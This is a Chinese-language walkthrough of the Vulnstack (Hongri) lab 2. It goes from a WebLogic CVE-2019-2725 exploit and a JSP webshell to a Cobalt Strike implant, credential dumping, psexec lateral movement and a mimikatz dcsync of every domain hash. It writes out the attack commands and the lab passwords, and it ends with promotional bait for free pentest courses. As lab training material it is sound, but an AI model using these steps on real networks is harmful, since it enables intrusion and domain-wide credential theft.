这是红日的第二套靶场，一开始直接通过域管起的weblogic，有点别扭，建议还是通过本地的用户来起weblogic，漏洞利用的点很多，不要局限于这篇文章，可以多尝试尝试其他漏洞。

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

密码均为:1qaz@WSX

靶场拓扑

​ 需要自己起一下环境 C:\Oracle\Middleware\user_projects\domains\base_domain\bin\startWebLogic

​

端口扫描

nmap -sV -sS -p- -Pn 192.168.85.148

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 7.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ssl/ms-wbt-server?
7001/tcp  open  http               Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
60966/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000; SP2
MAC Address: 00:0C:29:68:D3:5F (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

80端口是没有东西的，看一下7001端口，这是weblogic的默认端口 访问7001端口，报错页面，应该就能确定这是一个weblogic了

​ 进入console尝试一下弱口令，结果是不出意外的进不去 直接工具扫一下,直接一把梭了

​

​

目标机器是存在多个漏洞的，这里使用Weblogic Wls9-async反序列化漏洞，CVE编号为CVE-2019-2725

影响的版本为:Weblogic 10.x, Weblogic 12.1.3 漏洞描述：

该漏洞是由wls9-async组件导致的，该War包在反序列化处理的时候存在缺陷，可以在/_async/AsyncResponseService路径下构造恶意XML，从而导致在未授权的情况下远程命令执行

先上传一个jsp的木马，方便上传下载文件，这里直接用冰蝎自带的木马 将shell写入下面的路径

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

关于weblogic上传路径如何选择可以参考:https://www.cnblogs.com/sstfy/p/10350915.html

然后直接连接http://192.168.85.148:7001/uddiexplorer/shell.jsp即可

​

查看一下目标机器的进程，发现是存在360的

​

直接丢一个免杀马，上线cs，这里就可以看到这台机器是存在两张网卡

​

内网信息收集

首先通过cs抓一下密码，整理一下

本地用户
administrator:Admin@123

域用户 de1ay.com:
mssql:1qaz@WSX
administrator:1qaz@WSX
de1ay:1qaz@WSX

额。。。这里直接拿到域管的密码了，就当看不见，一台机器一台机器的打吧

拿到本地管理员密码，并且目标机器开启3389端口的，尝试登录到机器上，关掉360好做事情

​ 已经知道目标机器是存在两张网卡的，192.168.85.1/24和10.10.10.1/24 上传fscan扫描一下这两个段 扫描192.168.85.1/24发现还存在一台192.168.85.151的机器，并且存在ms170-10漏洞

​

扫描10.10.10.1/24网段，10.10.10.10和10.10.10.201均存在ms17010漏洞

​ 10.10.10.201和192.168.85.151是一台机器

基本可以确定这两个网段存活的主机了 整理一下主机信息

DC$     DC.de1ay.com    10.10.10.10
PC$     PC.de1ay.com    10.10.10.201,192.168.85.151
WEB$    WEB.de1ay.com   10.10.10.80,192.168.85.148

域管：administrator:1qaz@WSX
域用户：de1ay:1qaz@WSX，mssql:1qaz@WSX

既然PC这台机器是有外网IP的，那么直接通过msf打一下ms170-010 不出意外根本打不通

​

3389端口也连接不上....

先放一下看一下域控吧 设置一下cs的代理 可直接通过de1ay用户横向到DC,并且是system权限

proxychains4 impacket-psexec de1ay.com/de1ay:1qaz@WSX@10.10.10.10

​

直接通过cs自带的功能上线DC

​

​ 上传mimikatz直接通过dcsync获取域内所有用户的hash

lsadump::dcsync /domain:de1ay.com /all /csv

​ 直接通过域管的hash上线PC机器，三台机器全部上线cs

​

​ 看到这里的大佬，动动发财的小手 点赞 + 回复 + 收藏，能【 关注 】一波就更好了

我是一名渗透测试工程师，为了感谢读者们，我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家，回馈每一个读者，希望能帮到你们。

干货主要有：

①2000多本网安必看电子书（主流和经典的书籍应该都有了）

②PHP标准库资料（最全中文版）

③项目源码（四五十个有趣且经典的练手项目及源码）

④ 网络安全基础入门、Linux运维，web安全、渗透测试方面的视频（适合小白学习）

⑤ 网络安全学习路线图（告别不入流的学习）

⑥ 渗透测试工具大全

⑦ 2023网络安全/Web安全/渗透测试工程师面试手册大全

各位朋友们可以关注+评论一波 然后点击下方 即可免费拿捏

【2023全套渗透测试教程点击获取】